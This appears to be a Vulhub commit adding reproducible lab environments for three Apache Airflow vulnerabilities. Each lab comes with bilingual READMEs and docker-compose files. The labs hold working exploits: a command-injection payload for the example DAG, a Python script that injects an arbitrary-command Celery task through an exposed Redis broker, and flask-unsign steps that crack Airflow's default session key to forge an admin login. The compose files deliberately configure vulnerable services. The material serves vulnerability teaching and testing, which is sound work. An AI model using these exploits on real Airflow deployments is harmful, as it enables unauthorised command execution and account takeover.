first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
BIN
airflow/CVE-2020-11978/1.png
Normal file
After Width: | Height: | Size: 118 KiB |
BIN
airflow/CVE-2020-11978/2.png
Normal file
After Width: | Height: | Size: 18 KiB |
BIN
airflow/CVE-2020-11978/3.png
Normal file
After Width: | Height: | Size: 16 KiB |
BIN
airflow/CVE-2020-11978/4.png
Normal file
After Width: | Height: | Size: 11 KiB |
46
airflow/CVE-2020-11978/README.md
Normal file
@@ -0,0 +1,46 @@
|
||||
# Apache Airflow Command Injection in Example Dag (CVE-2020-11978)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Airflow is an open source, distributed task scheduling framework. In the version prior to 1.10.10, there is a command injection vulnerability in the example DAG `example_trigger_target_dag`, which caused attackers to execute arbitrary commands in the worker process.
|
||||
|
||||
Since there are many components to be started, it may be a bit stuck. Please prepare more than 2G of memory for the use of the virtual machine.
|
||||
|
||||
References:
|
||||
|
||||
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
|
||||
- <https://github.com/pberba/CVE-2020-11978>
|
||||
|
||||
## Vulnerability Environment
|
||||
|
||||
Execute the following commands to start airflow 1.10.10:
|
||||
|
||||
```bash
|
||||
#Initialize the database
|
||||
docker compose run airflow-init
|
||||
|
||||
#Start service
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
## Exploit
|
||||
|
||||
Visit `http://your-ip:8080` to see the airflow management terminal, and turn on the `example_trigger_target_dag` flag:
|
||||
|
||||

|
||||
|
||||
Click the "triger" button on the right, then input the configuration JSON with the crafted payload `{"message":"'\";touch /tmp/airflow_dag_success;#"}`:
|
||||
|
||||

|
||||
|
||||
Wait a few seconds to see the execution of "success":
|
||||
|
||||

|
||||
|
||||
Go to the CeleryWorker container to see the result, `touch /tmp/airflow_dag_success` has been successfully executed:
|
||||
|
||||
```
|
||||
docker compose exec airflow-worker ls -l /tmp
|
||||
```
|
||||
|
||||

|
46
airflow/CVE-2020-11978/README.zh-cn.md
Normal file
@@ -0,0 +1,46 @@
|
||||
# Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
|
||||
|
||||
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。
|
||||
|
||||
由于启动的组件比较多,可能会有点卡,运行此环境可能需要准备2G以上的内存。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
|
||||
- <https://github.com/pberba/CVE-2020-11978>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
依次执行如下命令启动airflow 1.10.10:
|
||||
|
||||
```bash
|
||||
#初始化数据库
|
||||
docker compose run airflow-init
|
||||
|
||||
#启动服务
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
访问`http://your-ip:8080`进入airflow管理端,将`example_trigger_target_dag`前面的Off改为On:
|
||||
|
||||

|
||||
|
||||
再点击执行按钮,在Configuration JSON中输入:`{"message":"'\";touch /tmp/airflow_dag_success;#"}`,再点`Trigger`执行dag:
|
||||
|
||||

|
||||
|
||||
等几秒可以看到执行成功:
|
||||
|
||||

|
||||
|
||||
到CeleryWorker容器中进行查看:
|
||||
|
||||
```bash
|
||||
docker compose exec airflow-worker ls -l /tmp
|
||||
```
|
||||
|
||||
可以看到`touch /tmp/airflow_dag_success`成功被执行:
|
||||
|
||||

|
90
airflow/CVE-2020-11978/docker-compose.yml
Normal file
@@ -0,0 +1,90 @@
|
||||
version: '3'
|
||||
x-airflow-common:
|
||||
&airflow-common
|
||||
image: vulhub/airflow:1.10.10
|
||||
environment:
|
||||
&airflow-common-env
|
||||
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
|
||||
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
|
||||
AIRFLOW__CORE__FERNET_KEY: ''
|
||||
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
|
||||
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
|
||||
#AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
|
||||
AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
|
||||
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
|
||||
depends_on:
|
||||
redis:
|
||||
condition: service_healthy
|
||||
postgres:
|
||||
condition: service_healthy
|
||||
|
||||
services:
|
||||
postgres:
|
||||
image: postgres:13-alpine
|
||||
environment:
|
||||
POSTGRES_USER: airflow
|
||||
POSTGRES_PASSWORD: airflow
|
||||
POSTGRES_DB: airflow
|
||||
healthcheck:
|
||||
test: ["CMD", "pg_isready", "-U", "airflow"]
|
||||
interval: 5s
|
||||
retries: 5
|
||||
|
||||
redis:
|
||||
image: redis:5-alpine
|
||||
healthcheck:
|
||||
test: ["CMD", "redis-cli", "ping"]
|
||||
interval: 5s
|
||||
timeout: 30s
|
||||
retries: 50
|
||||
|
||||
airflow-webserver:
|
||||
<<: *airflow-common
|
||||
command: webserver
|
||||
ports:
|
||||
- 8080:8080
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-scheduler:
|
||||
<<: *airflow-common
|
||||
command: scheduler
|
||||
healthcheck:
|
||||
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-worker:
|
||||
<<: *airflow-common
|
||||
command: worker
|
||||
healthcheck:
|
||||
test:
|
||||
- "CMD-SHELL"
|
||||
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-init:
|
||||
<<: *airflow-common
|
||||
command: initdb
|
||||
environment:
|
||||
<<: *airflow-common-env
|
||||
_AIRFLOW_DB_UPGRADE: 'true'
|
||||
|
||||
flower:
|
||||
<<: *airflow-common
|
||||
command: flower
|
||||
ports:
|
||||
- 5555:5555
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
BIN
airflow/CVE-2020-11981/1.png
Normal file
After Width: | Height: | Size: 21 KiB |
BIN
airflow/CVE-2020-11981/2.png
Normal file
After Width: | Height: | Size: 11 KiB |
53
airflow/CVE-2020-11981/README.md
Normal file
@@ -0,0 +1,53 @@
|
||||
# Apache Airflow Celery Broker Remote Command Execution (CVE-2020-11981)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Airflow is an open source, distributed task scheduling framework. In the version prior to 1.10.10, if the Redis broker (such as Redis or RabbitMQ) has been controlled by attacker, the attacker can execute arbitrary commands in the worker process.
|
||||
|
||||
Since there are many components to be started, it may be a bit stuck. Please prepare more than 2G of memory for the use of the virtual machine.
|
||||
|
||||
References:
|
||||
|
||||
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
|
||||
- <https://github.com/apache/airflow/pull/9178>
|
||||
|
||||
## Vulnerability Environment
|
||||
|
||||
Execute the following commands to start an airflow 1.10.10 server:
|
||||
|
||||
```bash
|
||||
#Initialize the database
|
||||
docker compose run airflow-init
|
||||
|
||||
#Start service
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
## Exploit
|
||||
|
||||
For exploit this vulnerability, you have to get the write permission of the Celery broker, Redis. In Vulhub environment, Redis port 6379 is exposing on the Internet.
|
||||
|
||||
Through the Redis, you can add the evil task `airflow.executors.celery_executor.execute_command` to the queue to execute arbitrary commands.
|
||||
|
||||
Use this script [exploit_airflow_celery.py](exploit_airflow_celery.py) to execute the command `touch /tmp/airflow_celery_success`
|
||||
|
||||
```
|
||||
pip install redis
|
||||
python exploit_airflow_celery.py [your-ip]
|
||||
```
|
||||
|
||||
See the results on the logs:
|
||||
|
||||
```bash
|
||||
docker compose logs airflow-worker
|
||||
```
|
||||
|
||||

|
||||
|
||||
As you can see, `touch /tmp/airflow_celery_success` has been successfully executed:
|
||||
|
||||
```
|
||||
docker compose exec airflow-worker ls -l /tmp
|
||||
```
|
||||
|
||||

|
51
airflow/CVE-2020-11981/README.zh-cn.md
Normal file
@@ -0,0 +1,51 @@
|
||||
# Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
|
||||
|
||||
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。
|
||||
|
||||
由于启动的组件比较多,可能会有点卡,运行此环境可能需要准备2G以上的内存。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
|
||||
- <https://github.com/apache/airflow/pull/9178>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
依次执行如下命令启动airflow 1.10.10
|
||||
|
||||
```bash
|
||||
#初始化数据库
|
||||
docker compose run airflow-init
|
||||
|
||||
#启动服务
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
## 漏洞利用
|
||||
|
||||
利用这个漏洞需要控制消息中间件,Vulhub环境中Redis存在未授权访问。通过未授权访问,攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令,参数为命令执行中所需要的数组。
|
||||
|
||||
我们可以使用[exploit_airflow_celery.py](exploit_airflow_celery.py)这个小脚本来执行命令`touch /tmp/airflow_celery_success`:
|
||||
|
||||
```bash
|
||||
pip install redis
|
||||
python exploit_airflow_celery.py [your-ip]
|
||||
```
|
||||
|
||||
查看结果:
|
||||
|
||||
```bash
|
||||
docker compose logs airflow-worker
|
||||
```
|
||||
|
||||
可以看到如下任务消息:
|
||||
|
||||

|
||||
|
||||
```bash
|
||||
docker compose exec airflow-worker ls -l /tmp
|
||||
```
|
||||
|
||||
可以看到成功创建了文件`airflow_celery_success`:
|
||||
|
||||

|
92
airflow/CVE-2020-11981/docker-compose.yml
Normal file
@@ -0,0 +1,92 @@
|
||||
version: '3'
|
||||
x-airflow-common:
|
||||
&airflow-common
|
||||
image: vulhub/airflow:1.10.10
|
||||
environment:
|
||||
&airflow-common-env
|
||||
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
|
||||
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
|
||||
AIRFLOW__CORE__FERNET_KEY: ''
|
||||
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
|
||||
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
|
||||
#AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
|
||||
AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
|
||||
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
|
||||
depends_on:
|
||||
redis:
|
||||
condition: service_healthy
|
||||
postgres:
|
||||
condition: service_healthy
|
||||
|
||||
services:
|
||||
postgres:
|
||||
image: postgres:13-alpine
|
||||
environment:
|
||||
POSTGRES_USER: airflow
|
||||
POSTGRES_PASSWORD: airflow
|
||||
POSTGRES_DB: airflow
|
||||
healthcheck:
|
||||
test: ["CMD", "pg_isready", "-U", "airflow"]
|
||||
interval: 5s
|
||||
retries: 5
|
||||
|
||||
redis:
|
||||
image: redis:5-alpine
|
||||
ports:
|
||||
- 6379:6379
|
||||
healthcheck:
|
||||
test: ["CMD", "redis-cli", "ping"]
|
||||
interval: 5s
|
||||
timeout: 30s
|
||||
retries: 50
|
||||
|
||||
airflow-webserver:
|
||||
<<: *airflow-common
|
||||
command: webserver
|
||||
ports:
|
||||
- 8080:8080
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-scheduler:
|
||||
<<: *airflow-common
|
||||
command: scheduler
|
||||
healthcheck:
|
||||
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-worker:
|
||||
<<: *airflow-common
|
||||
command: worker
|
||||
healthcheck:
|
||||
test:
|
||||
- "CMD-SHELL"
|
||||
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-init:
|
||||
<<: *airflow-common
|
||||
command: initdb
|
||||
environment:
|
||||
<<: *airflow-common-env
|
||||
_AIRFLOW_DB_UPGRADE: 'true'
|
||||
|
||||
flower:
|
||||
<<: *airflow-common
|
||||
command: flower
|
||||
ports:
|
||||
- 5555:5555
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
14
airflow/CVE-2020-11981/exploit_airflow_celery.py
Normal file
@@ -0,0 +1,14 @@
|
||||
import pickle
|
||||
import json
|
||||
import base64
|
||||
import redis
|
||||
import sys
|
||||
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)
|
||||
queue_name = 'default'
|
||||
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
|
||||
task_dict = json.loads(ori_str)
|
||||
command = ['touch', '/tmp/airflow_celery_success']
|
||||
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
|
||||
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
|
||||
print(task_dict)
|
||||
r.lpush(queue_name,json.dumps(task_dict))
|
BIN
airflow/CVE-2020-17526/1.png
Normal file
After Width: | Height: | Size: 27 KiB |
BIN
airflow/CVE-2020-17526/2.png
Normal file
After Width: | Height: | Size: 20 KiB |
BIN
airflow/CVE-2020-17526/3.png
Normal file
After Width: | Height: | Size: 11 KiB |
BIN
airflow/CVE-2020-17526/4.png
Normal file
After Width: | Height: | Size: 106 KiB |
56
airflow/CVE-2020-17526/README.md
Normal file
@@ -0,0 +1,56 @@
|
||||
# Apache Airflow Authentication Bypass (CVE-2020-17526)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Airflow is an open source, distributed task scheduling framework. Although authentication is not required by default, but the administration can specify the `webserver.authenticate=True` to enable it.
|
||||
|
||||
In the version prior to 1.10.13, Apache Airflow uses a default session secert key, which leads to impersonate arbitrary user when authentication is enabled.
|
||||
|
||||
References:
|
||||
|
||||
- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
|
||||
- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>
|
||||
|
||||
## Vulnerability Environment
|
||||
|
||||
Execute the following commands to start an airflow 1.10.10 server:
|
||||
|
||||
```bash
|
||||
#Initialize the database
|
||||
docker compose run airflow-init
|
||||
|
||||
#Start service
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the server is started, browse the `http://your-ip:8080` to see the login page of Apache Airflow. Yes, this server required authentication.
|
||||
|
||||
## Exploit
|
||||
|
||||
Firstly, browse the login page and get a session string from Cookie:
|
||||
|
||||
```
|
||||
curl -v http://localhost:8080/admin/airflow/login
|
||||
```
|
||||
|
||||

|
||||
|
||||
Then, use [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) to crack the session key:
|
||||
|
||||
```
|
||||
flask-unsign -u -c [session from Cookie]
|
||||
```
|
||||
|
||||

|
||||
|
||||
Bingo, we got the valid session key `temporary_key`. Then, use this key to generate a new session whose `user_id` equals to `1`:
|
||||
|
||||
```
|
||||
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
|
||||
```
|
||||
|
||||

|
||||
|
||||
Finally, use this generated session to log in successfully:
|
||||
|
||||

|
56
airflow/CVE-2020-17526/README.zh-cn.md
Normal file
@@ -0,0 +1,56 @@
|
||||
# Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定`webserver.authenticate=True`来开启认证。
|
||||
|
||||
在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
|
||||
- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动一个Apache Airflow 1.10.10服务器:
|
||||
|
||||
```bash
|
||||
#Initialize the database
|
||||
docker compose run airflow-init
|
||||
|
||||
#Start service
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
服务器启动后,访问`http://your-ip:8080`即可查看到登录页面。
|
||||
|
||||
## 漏洞利用
|
||||
|
||||
首先,我们访问登录页面,服务器会返回一个签名后的Cookie:
|
||||
|
||||
```
|
||||
curl -v http://localhost:8080/admin/airflow/login
|
||||
```
|
||||
|
||||

|
||||
|
||||
然后,使用[flask-unsign](https://github.com/Paradoxis/Flask-Unsign)这个工具来爆破签名时使用的`SECRET_KEY`:
|
||||
|
||||
```
|
||||
flask-unsign -u -c [session from Cookie]
|
||||
```
|
||||
|
||||

|
||||
|
||||
Bingo,成功爆破出Key是`temporary_key`。使用这个key生成一个新的session,其中伪造`user_id`为1:
|
||||
|
||||
```
|
||||
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
|
||||
```
|
||||
|
||||

|
||||
|
||||
在浏览器中使用这个新生成的session,可见已成功登录:
|
||||
|
||||

|
92
airflow/CVE-2020-17526/docker-compose.yml
Normal file
@@ -0,0 +1,92 @@
|
||||
version: '3'
|
||||
x-airflow-common:
|
||||
&airflow-common
|
||||
image: vulhub/airflow:1.10.10
|
||||
environment:
|
||||
&airflow-common-env
|
||||
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
|
||||
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
|
||||
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
|
||||
AIRFLOW__CORE__FERNET_KEY: ''
|
||||
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
|
||||
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
|
||||
AIRFLOW__WEBSERVER__AUTHENTICATE: 'true'
|
||||
AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth'
|
||||
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
|
||||
depends_on:
|
||||
redis:
|
||||
condition: service_healthy
|
||||
postgres:
|
||||
condition: service_healthy
|
||||
|
||||
services:
|
||||
postgres:
|
||||
image: postgres:13-alpine
|
||||
environment:
|
||||
POSTGRES_USER: airflow
|
||||
POSTGRES_PASSWORD: airflow
|
||||
POSTGRES_DB: airflow
|
||||
healthcheck:
|
||||
test: ["CMD", "pg_isready", "-U", "airflow"]
|
||||
interval: 5s
|
||||
retries: 5
|
||||
|
||||
redis:
|
||||
image: redis:5-alpine
|
||||
healthcheck:
|
||||
test: ["CMD", "redis-cli", "ping"]
|
||||
interval: 5s
|
||||
timeout: 30s
|
||||
retries: 50
|
||||
|
||||
airflow-webserver:
|
||||
<<: *airflow-common
|
||||
command: webserver
|
||||
ports:
|
||||
- 8080:8080
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-scheduler:
|
||||
<<: *airflow-common
|
||||
command: scheduler
|
||||
healthcheck:
|
||||
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-worker:
|
||||
<<: *airflow-common
|
||||
command: worker
|
||||
healthcheck:
|
||||
test:
|
||||
- "CMD-SHELL"
|
||||
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
airflow-init:
|
||||
<<: *airflow-common
|
||||
entrypoint: python /opt/airflow/init-user.py
|
||||
volumes:
|
||||
- ./init-user.py:/opt/airflow/init-user.py
|
||||
environment:
|
||||
<<: *airflow-common-env
|
||||
_AIRFLOW_DB_UPGRADE: 'true'
|
||||
|
||||
flower:
|
||||
<<: *airflow-common
|
||||
command: flower
|
||||
ports:
|
||||
- 5555:5555
|
||||
healthcheck:
|
||||
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
|
||||
interval: 10s
|
||||
timeout: 10s
|
||||
retries: 5
|
17
airflow/CVE-2020-17526/init-user.py
Normal file
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/env python
|
||||
import os
|
||||
from airflow import models, settings
|
||||
from airflow.contrib.auth.backends.password_auth import PasswordUser
|
||||
|
||||
os.system('/entrypoint initdb')
|
||||
|
||||
user = PasswordUser(models.User())
|
||||
user.username = 'vulhub'
|
||||
user.email = 'vulhub@example.com'
|
||||
user.password = 'vulhub'
|
||||
user.superuser = True
|
||||
session = settings.Session()
|
||||
session.add(user)
|
||||
session.commit()
|
||||
session.close()
|
||||
print('initial user finished')
|